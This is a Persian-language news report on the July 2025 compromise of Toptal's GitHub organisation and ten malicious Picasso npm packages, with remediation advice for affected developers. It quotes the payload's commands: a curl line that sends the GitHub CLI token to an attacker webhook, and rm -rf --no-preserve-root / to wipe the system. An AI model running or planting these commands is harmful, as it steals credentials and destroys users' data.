هک GitHub تپ‌تال: انتشار ۱۰ بسته npm مخرب با دانلود بیش از ۵٬۰۰۰ بار

در این رخداد امنیتی، مهاجمان دسترسی سازمانی GitHub تپ‌تال را در تاریخ ۲۰ جولای ۲۰۲۵ به‌دست آوردند و ۱۰ بسته npm متعلق به Picasso را آلوده کردند. payloadهای قرار داده‌شده در package.json شامل اسکریپت‌هایی است که ابتدا توکن GitHub را استخراج و ارسال کرده، و سپس سیستم قربانی را به‌صورت کامل پاک می‌کنند. این بسته‌ها در حدود ۵٬۰۰۰ بار دانلود شدند و پس از سه روز حذف شدند، اما تپ‌تال هنوز اطلاع‌رسانی به کاربران انجام نداده است.

در تاریخ ۲۰ ژوئیه ۲۰۲۵، حمله‌ای از نوع supply‑chain علیه تپ‌تال رخ داد. مهاجمان توانستند حساب سازمان GitHub این شرکت را هک کرده و به ۷۳ مخزن دسترسی پیدا کنند. در کمتر از پنج دقیقه، تمام این مخازن به حالت عمومی تغییر یافتند و کدهای حساس شرکت در معرض دید قرار گرفت.

بیش از ۱۰ بسته‌ای که مربوط به طراحی سیستم Picasso بودند (مانند @toptal/picasso‑tailwind, picasso‑forms, picasso‑charts و غیره)، آلوده شده و در npm منتشر شدند. این بسته‌ها به‌عنوان نسخه‌هایی قانونی و رسمی از تپ‌تال منتشر شدند.

payloadهای مخرب در فایل‌های package.json قرار داشتند: اسکریپت preinstall توکن GitHub CLI را با فرمان curl -d "$(gh auth token)" https://webhook.site/... استخراج و به endpoint مهاجم ارسال می‌کند و اسکریپت postinstall پس از آن سیستم فایل را با دستوراتی مانند sudo rm -rf --no-preserve-root / یا rm /s /q روی ویندوز پاک می‌کند

تقریباً ۵٬۰۰۰ توسعه‌دهنده این بسته‌ها را نصب کردند، قبل از آن‌که مخرب بودن آن‌ها شناسایی و بسته‌ها حذف شوند. این موضوع نگرانی‌های گسترده‌ای درباره اعتماد به بسته‌های منبع‌باز رسمی ایجاد کرده است.

تپ‌تال در تاریخ ۲۳ جولای بسته‌های مخرب را deprecated کرده و به نسخه سالم بازگشت، اما هنوز هیچ اطلاع‌رسانی عمومی در خصوص کاربران در معرض خطر نداده است. محققان توصیه کردند کاربران در صورت نصب این نسخه‌ها، به نسخه‌های قبلی بازگردند، توکن‌های GitHub را بازنشانی کنند و سیستم را برای شواهد پاک‌سازی بررسی نمایند.

The Hacker News – Hackers Breach Toptal GitHub, Publish 10 Malicious npm Packages

Socket Threat Research Team – گزارش حمله و تحلیل payload

Ars Technica – تحلیل گسترده حملات زنجیره‌ای npm